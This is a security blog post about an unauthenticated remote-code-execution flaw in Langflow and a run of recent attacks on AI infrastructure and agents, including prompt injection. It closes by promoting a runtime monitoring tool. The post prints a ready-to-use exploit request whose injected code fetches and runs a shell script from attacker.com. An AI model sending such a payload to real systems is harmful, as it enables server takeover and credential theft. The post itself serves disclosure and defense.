DEV Community

Dar Fazulyanov
Dar Fazulyanov

Posted on • Originally published at clawmoat.com

Langflow Got Hit in 20 Hours — Here's the Pattern That Keeps Repeating

#ai #security #webdev #devops

Last week, a critical RCE dropped for Langflow (CVE-2026-33017). By the time most developers read the advisory, active exploitation had already been running for 20 hours.

No public PoC existed. Attackers read the advisory description, built working exploits from scratch, and started scanning the internet for vulnerable instances — all before most teams could schedule a patching window.

This is becoming the normal timeline for AI infrastructure CVEs.

What happened

The bug lives in /api/v1/build_public_tmp/{flow_id}/flow. This endpoint is intentionally unauthenticated — it's designed to serve public flows without login. But it also accepts an optional data parameter that lets callers supply their own flow definition.

That flow definition can contain arbitrary Python code in the node definitions. The server passes it to exec() with zero sandboxing.

One HTTP POST request. No authentication. Full server-level code execution.

curl -X POST https://your-langflow-instance.com/api/v1/build_public_tmp/{flow_id}/flow \
  -H "Content-Type: application/json" \
  -d '{"data": {"nodes": [{"data": {"node": {"template": {"code": {"value": "import os; os.system(\"curl attacker.com/shell.sh | bash\")"}}}}}]}}'
Enter fullscreen mode Exit fullscreen mode

Once in, attackers extracted environment variables, API keys, database credentials, and set up reverse shells. Sysdig confirmed supply chain compromise of downstream pipelines.

This is Langflow's second critical RCE with the same root cause

CVE-2025-3248 (CVSS 9.8) hit the same exec() call via a different endpoint. That bug is already on CISA's Known Exploited Vulnerabilities list.

Same root cause. New endpoint. Different CVE.

The researcher who found CVE-2026-33017 described the fix clearly: "The real fix is removing the data parameter from the public endpoint entirely, so public flows can only execute their stored (server-side) flow data and never accept attacker-supplied definitions."

The patch (dev version 1.9.0.dev8) does exactly that.

The pattern showing up in March 2026 alone

This isn't isolated. Look at what's happened to AI infrastructure this month:

  • LiteLLM supply chain — malicious packages with exec(b64decode) obfuscation
  • ShadowPrompt — zero-click prompt injection in Claude's Chrome extension via XSS
  • OpenClaw CVE-2026-25253 — one-click RCE, 42,900 instances exposed
  • Perplexity Comet — file theft via malicious calendar invite (zero user interaction)
  • Zenity's RSAC demos — live exploitation of Cursor, Salesforce Agentforce, ChatGPT, Copilot

At RSAC this week, Zenity's CTO Michael Bargury had a phrase I keep thinking about:

"AI is just gullible. We're trying to shift the mindset from 'prompt injection' — because it's a very technical term — and convince people that this is actually just persuasion. I'm just persuading the AI agent that it should do something else."

That framing matters. Trained guardrails can be "persuaded." Runtime enforcement can't.

Why 20 hours is the new attack window

Two things changed:

  1. AI infrastructure became production infrastructure. Langflow isn't a toy — it's running enterprise AI pipelines, handling customer data, connected to databases and downstream services. Attackers know this.

  2. The advisory is the PoC. A well-written vulnerability advisory tells you what the vulnerable parameter is, what the vulnerable code path does, and where the patch lives. That's enough to build a working exploit in a few hours if you know what you're doing.

The old assumption — "we have a few days between disclosure and exploitation" — doesn't hold for AI infrastructure.

What actually stops this

Model-level guardrails don't prevent network-level exploits. Prompt injection filtering doesn't catch exec() injection in a Python process.

What works: monitoring what your AI pipeline actually does at runtime.

  • What environment variables is it reading?
  • What external URLs is it calling?
  • What processes is it spawning?
  • What files is it writing?

If you don't have visibility into these at runtime, you're not slow on security. You're blind.

ClawMoat is an open-source runtime security layer for AI agents — supply chain scanning, secret detection, network egress logging, and behavior monitoring. github.com/darfaz/clawmoat

Affected versions: Langflow ≤ 1.8.1

Patch: 1.9.0.dev8 (development), stable release pending

CVE: CVE-2026-33017 (CVSS 9.3)

Top comments (0)